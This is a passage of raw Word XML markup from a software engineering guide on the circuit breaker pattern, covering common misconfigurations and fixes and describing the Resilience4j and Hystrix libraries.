    </w:p>
    <w:p w14:paraId="7BB3600F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│                       ^                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B792187" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│              Tripped at 14:30:05                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107F81B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C60944" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ Last 5 transitions:                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E26EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ 14:30:05 CLOSED→OPEN (failure rate 78%)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70085F43" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ 14:28:40 HALF_OPEN→CLOSED (probe success)        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B6F46" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ 14:28:10 OPEN→HALF_OPEN (timeout expired)        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28937D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ 14:27:40 CLOSED→OPEN (failure rate 65%)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF120E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ 14:25:00 HALF_OPEN→CLOSED (probe success)        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01546F4B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>└─────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E394F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="4A454E48">
          <v:rect id="_x0000_i4254" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="312953DC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Circuit Breaker Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982DAD4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Circuit Breaker That Never Trips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11C62D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Symptom:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Configuration is too lenient. The downstream is clearly broken, but the circuit never opens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC95A8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F36465D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure threshold too high (90%): By the time 90% of calls fail, the system is already cascading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1036530D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Window too large (10 minutes): Takes 10 minutes of sustained failure to trip. Damage done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1CD78B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Not counting timeouts as failures: Slow calls drain thread pools just as effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60859D5A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>4xx responses counted as failures: Inflation of "failures" makes the real failure signal noisy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F265D5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Circuit Breaker That Trips Too Often (Flapping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E395193" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Symptom:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Circuit rapidly alternates between open and closed. Users experience intermittent degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB7342" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74817DEB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Threshold too low (20%): Normal jitter trips the circuit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C8A37F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Window too small (2 seconds): Momentary spikes trip it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35142D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Minimum throughput threshold not configured: 1 failure out of 2 requests = 50% → trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615408C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Half-open probe count too low (1): One unlucky probe failure re-opens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE1424F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9BB40" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Increase minimum throughput (need 20+ calls before evaluating).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0351451E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Increase window size (smooth out transient spikes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD55295" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Exponential backoff on repeated opens (wait longer each time before re-testing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE114D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Hysteresis: require a LOWER failure rate to close than the rate that opened. E.g., open at 50%, only close when rate drops below 20%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A620F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 Circuit Breaker Hiding the Real Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B109DEE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Symptom:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The circuit breaker quietly handles failures. Nobody notices the downstream is broken for hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787B46A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cause:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Fallback works so well that monitoring doesn't detect degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C211136" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E2220" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Always alert on circuit breaker state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9019D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Track fallback invocation as a separate metric.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3C1C62" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Set SLOs that include circuit breaker rejections as "degraded" (not "healthy").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601995D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Regular review of circuit breaker events (if it's opening daily at 3 AM, something's wrong at 3 AM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095784C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.4 Circuit Breaker Without Fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1134E1BD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Symptom:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Circuit opens → users get raw 503 errors → terrible user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C4D93E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cause:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Developers implemented the circuit breaker but not the fallback behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECEE13B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every circuit breaker MUST have a defined fallback strategy.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Even if the fallback is just a user-friendly error message ("We're experiencing issues, please try again in a few minutes") rather than a cryptic HTTP 503.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3A019" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.5 Testing Only the Happy Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D41CF19" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Symptom:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Circuit breaker works in unit tests but behaves unexpectedly in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B2E120" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What's missed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297369CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>What happens when the circuit opens under high concurrency?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEF43A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>What happens when the circuit opens mid-request (race condition)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DC4098" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>What happens when the fallback itself fails?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A6D3CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>What happens when the clock jumps (NTP sync) during the wait duration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20180504" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>What happens when half-open probes succeed but the very next requests fail (false recovery)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54851E01" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Chaos engineering — deliberately inject failures in production/staging and verify the circuit breaker behaves correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DCE502" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="5FD9029C">
          <v:rect id="_x0000_i4255" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="624A2CA1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Circuit Breaker in Different Technology Stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F1173" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Resilience4j (Java — Most Popular Modern Choice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D575F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDB53F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Designed for functional programming style (decorators).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF14A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Lightweight (no external dependencies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27C101" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Uses ring buffer sliding window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39240CA5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Thread-safe with atomic operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705E225" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Integrates with Spring Boot, Micronaut, Quarkus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C174DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usage pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD30CE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363625AE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>CircuitBreaker → Retry → RateLimiter → Bulkhead → TimeLimiter → Actual Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56504BB1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The order matters: Circuit breaker is checked FIRST (if open, nothing else executes). Retry is inside the circuit breaker (each retry attempt is recorded by the circuit breaker).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6174AA14" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Hystrix (Netflix — Deprecated but Influential)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ADA6DE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Historical importance:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Defined the circuit breaker pattern for microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E7782D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key concepts Hystrix introduced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA34E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command pattern:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Each remote call is wrapped in a "HystrixCommand" with defined fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC8AF6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread pool isolation (bulkhead):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Each dependency gets its own thread pool. Failures are isolated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FBE1AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request collapsing:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Multiple individual calls batched into one bulk call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D6951" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Deduplicate identical calls within a single request context.</w:t>
      </w:r>
